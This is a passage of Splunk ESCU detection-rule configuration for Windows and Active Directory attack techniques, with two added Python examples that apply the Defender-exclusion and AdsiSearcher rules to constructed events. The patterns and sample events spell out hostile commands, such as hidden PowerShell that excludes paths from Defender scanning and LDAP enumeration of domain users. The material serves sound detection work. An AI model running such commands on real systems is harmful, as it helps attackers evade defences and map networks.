In addition to count by analytics, adding a risk score may be useful. In our testing, with 22 events over 30 days, the risk scores ranged from 500 to 80,000. Your organization will be different, monitor and modify as needed. action.escu.creation_date = 2023-05-23 action.escu.modification_date = 2023-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Active Directory Privilege Escalation Identified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Active Directory Privilege Escalation Identified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The primary objective of this correlation rule is to detect and alert on potential privilege escalation activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Privilege Escalation analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Privilege Escalation analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. 
This threshold can be customized to suit the needs and risk appetite of the organization. action.notable.param.rule_title = RBA: Active Directory Privilege Escalation Identified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Active Directory Privilege Escalation" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `active_directory_privilege_escalation_identified_filter` [ESCU - Active Setup Registry Autostart - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. 
This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.014", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Active setup installer may add or modify this registry. 
action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Active Setup Registry Autostart - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Active Setup Registry Autostart - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.014", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. 
This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry. action.notable.param.rule_title = Active Setup Registry Autostart action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= "StubPath" Registry.registry_path = "*\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `active_setup_registry_autostart_filter` [ESCU - Add DefaultUser And Password In Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to detect a suspicious registry modification to implement auto admin logon to a host. 
This technique was seen in BlackMatter ransomware, which rebooted the compromised host into safe mode with automatic logon so that it could continue encrypting the whole network. Configuring auto-logon is not a common practice and should be treated as a suspicious TTP and investigated if found on the network. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Legitimate auto-logon configurations (kiosks, lab or build machines, deployment tooling) will trigger this rule. Filter as needed. action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Add DefaultUser And Password In Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackMatter Ransomware"] action.risk = 1 action.risk.param._risk_message = modified registry key $registry_key_name$ with registry value $registry_value_name$ to prepare automatic admin logon action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Add DefaultUser And Password In Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]} schedule_window = auto 
alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" AND (Registry.registry_value_name= DefaultPassword OR Registry.registry_value_name= DefaultUserName)) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_defaultuser_and_password_in_registry_filter` [ESCU - Add or Set Windows Defender Exclusion - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious process command line that uses the Windows Defender exclusion feature. Adversaries, malware authors and red teams abuse the Add-MpPreference and Set-MpPreference cmdlets to exclude folder paths, file paths, processes and extensions from Windows Defender's real-time and scheduled scans so that their malicious code runs unscanned. This is a good indicator of defense evasion; look further at the events that follow this behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious process command line that uses the Windows Defender exclusion feature. Adversaries, malware authors and red teams abuse the Add-MpPreference and Set-MpPreference cmdlets to exclude folder paths, file paths, processes and extensions from Windows Defender's real-time and scheduled scans so that their malicious code runs unscanned. This is a good indicator of defense evasion; look further at the events that follow this behavior. 
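The Defender exclusion rule above matches on substrings of the command line. The following Python is an added example, not ESCU code, that applies the same idea to constructed Endpoint.Processes events and additionally pulls out which paths, processes or extensions were excluded; the sample command lines and host/user names are invented. It handles the details a substring match glosses over: the cmdlet wrapped inside a `powershell -c "..."` argument, PowerShell's unambiguous-prefix parameter abbreviations (`-ExclusionPa`), the `-Param:value` form, and comma-separated value lists.

```python
"""Detection logic for the Add/Set-MpPreference exclusion rule, run over
constructed process events. Added example, not Splunk ESCU code."""
import re
from dataclasses import dataclass, field

# Exclusion parameters shared by Add-MpPreference and Set-MpPreference.
EXCLUSION_PARAMS = ("ExclusionPath", "ExclusionProcess",
                    "ExclusionExtension", "ExclusionIpAddress")
CMDLET_RE = re.compile(r"\b(Add|Set)-MpPreference\b", re.IGNORECASE)
# Double-quoted, single-quoted or bare tokens; quotes are stripped afterwards.
TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')


@dataclass
class ExclusionHit:
    cmdlet: str                 # "Add-MpPreference" or "Set-MpPreference"
    parameter: str              # canonical parameter name
    values: list = field(default_factory=list)


def resolve_param(token):
    """Map a parameter token such as '-ExclusionPa' or '-exclusionpath:x' to
    its canonical name. PowerShell accepts any unambiguous prefix, so do the
    same; '-ExclusionP' is ambiguous (Path/Process) and returns None."""
    if not token.startswith("-"):
        return None
    name = token[1:].split(":", 1)[0].lower()
    if len(name) <= len("exclusion"):
        return None
    matches = [p for p in EXCLUSION_PARAMS if p.lower().startswith(name)]
    return matches[0] if len(matches) == 1 else None


def find_exclusions(cmdline):
    """Return one ExclusionHit per exclusion parameter in the command line."""
    m = CMDLET_RE.search(cmdline)
    if not m:
        return []
    # Tokenise only the text after the cmdlet so an outer powershell -c "..."
    # wrapper does not swallow the arguments into a single quoted token.
    tokens = [t.strip("\"'") for t in TOKEN_RE.findall(cmdline[m.end():])]
    tokens = [t for t in tokens if t]
    hits, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        param = resolve_param(tok)
        i += 1
        if param is None:           # some other parameter, or a stray value
            continue
        # -ExclusionPath:C:\x inline form; otherwise the values follow
        parts = [tok.split(":", 1)[1]] if ":" in tok else []
        while i < len(tokens) and not tokens[i].startswith("-"):
            parts.append(tokens[i])
            i += 1
        # 'a', 'b' arrives as tokens "a" "," "b": join, then split on commas
        values = [v.strip() for v in "".join(parts).split(",") if v.strip()]
        hits.append(ExclusionHit(m.group(0), param, values))
    return hits


# Constructed CIM Endpoint.Processes events; not real telemetry.
SAMPLE_EVENTS = [
    {"dest": "ws01", "user": "alice", "process": r'''powershell.exe -nop -w hidden -c "Add-MpPreference -ExclusionPath 'C:\Users\Public', 'C:\ProgramData\tmp' -ExclusionProcess 'loader.exe'"'''},
    {"dest": "ws02", "user": "bob", "process": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,dll -DisableRealtimeMonitoring $true'},
    {"dest": "ws03", "user": "carol", "process": r"powershell.exe Get-MpPreference | Select-Object ExclusionPath"},
    {"dest": "ws04", "user": "dave", "process": r"cmd.exe /c echo Add-MpPreference"},
]


def scan(events):
    """Apply the rule: flag events whose command line sets an exclusion."""
    findings = []
    for ev in events:
        hits = find_exclusions(ev["process"])
        if hits:
            findings.append({"dest": ev["dest"], "user": ev["user"],
                             "cmdlet": hits[0].cmdlet,
                             "exclusions": {h.parameter: h.values for h in hits}})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Only the first two events are findings: `Get-MpPreference` is not one of the two cmdlets, and the `echo` line names the cmdlet without an exclusion parameter, which is also why the ESCU search requires both `*-MpPreference *` and `*-exclusion*`.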
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or users may legitimately use this Windows Defender feature. Filter as needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Add or Set Windows Defender Exclusion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate"] action.risk = 1 action.risk.param._risk_message = exclusion command $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Add or Set Windows Defender Exclusion - Rule 
action.correlationsearch.annotations = {"analytic_story": ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious process command line that uses the Windows Defender exclusion feature. Adversaries, malware authors and red teams abuse the Add-MpPreference and Set-MpPreference cmdlets to exclude folder paths, file paths, processes and extensions from Windows Defender's real-time and scheduled scans so that their malicious code runs unscanned. This is a good indicator of defense evasion; look further at the events that follow this behavior. action.notable.param.rule_title = Add or Set Windows Defender Exclusion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*Add-MpPreference *" OR Processes.process = "*Set-MpPreference *") AND Processes.process="*-exclusion*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_or_set_windows_defender_exclusion_filter` [ESCU - AdsiSearcher Account Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following 
analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain user accounts; the search requires an `objectcategory=user` LDAP filter together with a `.FindAll()` call. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain user accounts; the search requires an `objectcategory=user` LDAP filter together with a `.FindAll()` call. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = This analytic requires the PowerShell Operational log (Microsoft-Windows-PowerShell/Operational) to be ingested with Script Block Logging enabled. Modify the `powershell` macro as needed to match the sourcetype or add an index. This analytic is specific to EventCode 4104, PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - AdsiSearcher Account Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Industroyer2", "Active Directory Discovery", "CISA AA23-347A", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = PowerShell script block containing "AdsiSearcher" used for domain user enumeration on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AdsiSearcher Account Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "Active Directory Discovery", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain user accounts; the search requires an `objectcategory=user` LDAP filter together with a `.FindAll()` call. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain users for situational awareness and Active Directory Discovery. 
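The AdsiSearcher rule requires three substrings to appear in one 4104 event. Windows logs a large script block as several 4104 events that share a ScriptBlockId and carry MessageNumber of MessageTotal, so an enumeration whose `[adsisearcher]` filter and `.FindAll()` call land in different fragments is missed by a per-event search. The Python below is an added example, not ESCU code, that reassembles fragments by ScriptBlockId before applying the rule, and shows the per-event result beside it; the events, hosts and user names are constructed.

```python
"""Reassemble fragmented PowerShell 4104 script blocks and apply the
[adsisearcher] user-enumeration rule. Added example, not Splunk ESCU code;
the events below are constructed."""
from collections import defaultdict

# The ESCU search requires all three substrings. Splunk wildcard matching is
# case-insensitive, so compare lowercased text.
REQUIRED = ("[adsisearcher]", "objectcategory=user", ".findall()")

# Constructed 4104 events. blk-a is one script block logged as two fragments;
# blk-b and blk-c are single-event blocks.
SAMPLE_4104 = [
    {"Computer": "ws01.corp.example", "UserID": "CORP\\alice", "ScriptBlockId": "blk-a",
     "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": '$s = [adsisearcher]"(objectcategory=user)"; $s.PageSize = 1000\n'},
    {"Computer": "ws01.corp.example", "UserID": "CORP\\alice", "ScriptBlockId": "blk-a",
     "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": 'foreach ($u in $s.FindAll()) { $u.Properties.samaccountname }\n'},
    {"Computer": "ws02.corp.example", "UserID": "CORP\\bob", "ScriptBlockId": "blk-b",
     "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": 'Get-ChildItem C:\\Users | Select-Object Name\n'},
    {"Computer": "dc01.corp.example", "UserID": "CORP\\svc_backup", "ScriptBlockId": "blk-c",
     "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "([adsisearcher]'(objectcategory=user)').FindAll() | % { $_.Properties.name }\n"},
]


def matches(text):
    """The rule's substring test, applied to one piece of script text."""
    low = text.lower()
    return all(s in low for s in REQUIRED)


def reassemble(events):
    """Group fragments by ScriptBlockId and join them in MessageNumber order.
    Returns {ScriptBlockId: (Computer, UserID, full_text)}."""
    frags, meta = defaultdict(list), {}
    for ev in events:
        frags[ev["ScriptBlockId"]].append((ev["MessageNumber"], ev["ScriptBlockText"]))
        meta[ev["ScriptBlockId"]] = (ev["Computer"], ev["UserID"])
    blocks = {}
    for block_id, parts in frags.items():
        parts.sort()
        blocks[block_id] = meta[block_id] + ("".join(t for _, t in parts),)
    return blocks


def detect(events):
    """Rule applied after reassembly: one hit per matching script block."""
    hits = []
    for block_id, (computer, user, text) in reassemble(events).items():
        if matches(text):
            hits.append({"dest": computer, "user": user, "ScriptBlockId": block_id})
    return sorted(hits, key=lambda h: h["ScriptBlockId"])


def detect_per_event(events):
    """What a search that judges each 4104 event on its own sees."""
    return [ev["ScriptBlockId"] for ev in events if matches(ev["ScriptBlockText"])]


if __name__ == "__main__":
    print("reassembled:", detect(SAMPLE_4104))
    print("per event:  ", detect_per_event(SAMPLE_4104))
```

In Splunk the same effect is obtained by aggregating ScriptBlockText by ScriptBlockId (for example with `stats values(ScriptBlockText)` or `transaction`) before the substring test; the cost is that the rule then fires once per block rather than once per event.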
action.notable.param.rule_title = AdsiSearcher Account Discovery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*[adsisearcher]*" ScriptBlockText = "*objectcategory=user*" ScriptBlockText = "*.findAll()*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Computer ScriptBlockText UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `adsisearcher_account_discovery_filter` [ESCU - Allow File And Printing Sharing In Firewall - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicious modification of the Windows Firewall that enables the File and Printer Sharing rule group. This technique was seen in ransomware, which enables the group so that the compromised host can discover and reach other machines on the network and encrypt more files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects a suspicious modification of the Windows Firewall that enables the File and Printer Sharing rule group. This technique was seen in ransomware, which enables the group so that the compromised host can discover and reach other machines on the network and encrypt more files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin may modify this firewall feature that may cause this rule to be triggered. action.escu.creation_date = 2023-12-15 action.escu.modification_date = 2023-12-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow File And Printing Sharing In Firewall - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A suspicious modification of firewall to allow file and printer sharing detected on host - $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow File And Printing Sharing In Firewall - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a 
suspicious modification of the Windows Firewall that enables the File and Printer Sharing rule group. This technique was seen in ransomware, which enables the group so that the compromised host can discover and reach other machines on the network and encrypt more files. action.notable.param.rule_title = Allow File And Printing Sharing In Firewall action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process= "*firewall*" Processes.process= "*group=\"File and Printer Sharing\"*" Processes.process="*enable=Yes*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_file_and_printing_sharing_in_firewall_filter` [ESCU - Allow Inbound Traffic By Firewall Rule Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a potentially suspicious modification of the FirewallRules registry key that allows inbound traffic to a specific local port. The search matches the Action=Allow, Dir=In and LPort tokens of the rule string regardless of profile; rules that apply to the Public profile are the most exposed. This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a potentially suspicious modification of the FirewallRules registry key that allows inbound traffic to a specific local port. The search matches the Action=Allow, Dir=In and LPort tokens of the rule string regardless of profile; rules that apply to the Public profile are the most exposed. 
This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Network administrators may add, remove or modify inbound firewall rules, which will trigger this rule. Filter as needed. action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Inbound Traffic By Firewall Rule Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse", "Azorult", "NjRAT", "PlugX"] action.risk = 1 action.risk.param._risk_message = Suspicious firewall allow rule modifications were detected via the registry on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Inbound Traffic By Firewall Rule Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse", "Azorult", "NjRAT", "PlugX"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a potentially suspicious modification of the FirewallRules registry key that allows inbound traffic to a specific local port. The search matches the Action=Allow, Dir=In and LPort tokens of the rule string regardless of profile; rules that apply to the Public profile are the most exposed. This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule. 
